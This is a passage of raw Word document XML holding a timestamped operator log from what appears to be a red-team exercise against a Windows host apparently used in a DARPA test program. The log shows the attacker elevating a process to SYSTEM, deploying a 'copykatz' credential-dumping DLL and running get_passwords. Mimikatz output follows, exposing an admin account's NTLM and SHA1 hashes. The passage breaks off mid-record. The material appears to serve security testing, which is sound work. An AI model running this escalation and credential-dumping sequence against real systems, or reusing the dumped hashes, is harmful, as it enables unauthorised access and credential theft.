    <w:p w14:paraId="6DF3C4F2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD763E3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ta1-fivedirections-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511FCB90" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;getpid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD133D2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] pid: 6208</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BDD755" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14FA9BC4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D367768" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;elevatepid '\\.\perfmon' 6208</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8FBC60" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Elevate process [\\.\perfmon] [6208]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3AA8C8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] elevate success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B69EECD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FB08EA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E91B5B2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36F472D0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE566DC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA7E2D6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] C:\Program Files\mozilla\firefox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB5E836" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;cd ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099A2980" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;cd ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A36CAB8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;cd ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230BF007" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;cd Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0407B3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A8189F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C56741" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1816D3C6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] All Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC71E62" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E56C11" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Default User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376FB98B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Public</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542DDC97" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] SSHD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E74778D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551B4F3D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] darpa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BBAA1C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] desktop.ini</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2179AA92" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539177EF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;cd admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB2DDF3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF969BF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="415AC69D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:48</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5282432F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;module copykatz /e5/deploy/copykatz.windows.x64.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A584D38" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589753CE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] +----------+-------------------------------------+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4076E658" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] |   name   | library                             | deployed |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6F9603" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] +----------+-------------------------------------+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDAB4F9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] | copykatz | /e5/deploy/copykatz.windows.x64.dll |    0     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145DA407" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] +----------+-------------------------------------+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676A65C6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;deploy copykatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CF56D6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Loading module /e5/deploy/copykatz.windows.x64.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68433DE2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] deploy success [copykatz] [/e5/deploy/copykatz.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AA07E6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;[*] register success [copykatz] [/e5/deploy/copykatz.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FE0BF8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] register success [copykatz] [/e5/deploy/copykatz.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741E2E63" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] register success [copykatz] [/e5/deploy/copykatz.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E69190" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] register success [copykatz] [/e5/deploy/copykatz.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6B160E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="133A01A3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335D88EE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;enable_logfile C:\\Users\\admin\\tropical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265AED93" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] copykatz.enable_logfile returned success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0958F573" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34CCF679" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3618548D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>W1&gt;get_passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7081D5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] copykatz.get_passwords returned success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D31B5B4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17146E65" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DBCE6B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] tropical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8A9B69" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C79025B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="595C3686" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A487E0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;cat tropical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFD6401" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F26D15" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>***** FILE(C:\Users\admin\tropical) LOGGING IS ENABLED  ****</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4F75A0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C606168" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>***** STARTING MIMIKATZ SEKURLSA PASSWORDS MODULE *****</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38858403" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Privilege '20' OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75262786" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53C747F9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F2104E2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication Id : 0 ; 2118010 (00000000:0020517a)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C51B61" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Session           : Interactive from 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B84ACE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>User Name         : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1A9043" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Domain            : TA1-FIVEDIRECTI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1D2280" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logon Server      : TA1-FIVEDIRECTI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC138E7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logon Time        : 5/7/2019 1:54:55 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB0DCCA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SID               : S-1-5-21-231540947-922634896-4161786520-1004</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621340A5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        msv :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A3DF2C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         [00000003] Primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B55DAD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Username : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD75C49" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Domain   : TA1-FIVEDIRECTI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFC3D54" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * NTLM     : 2b98b46fce607ebc2527666dc95cbecc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C98D11" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * SHA1     : cf2a0e59c8dfd16e1064ecacbd74d50ddbfe4beb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46359EF1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121F4E42" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5609F11F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Username : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56742679" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Domain   : TA1-FIVEDIRECTI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F4E598" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Password : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E18D8CE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A420F7B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Username : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0358C7D1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Domain   : TA1-FIVEDIRECTI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF64023" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Password : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25078D28" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBEF68C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1205297C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B153E9B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication Id : 0 ; 2117980 (00000000:0020515c)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290FA1DE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Session           : Interactive from 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C1884E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
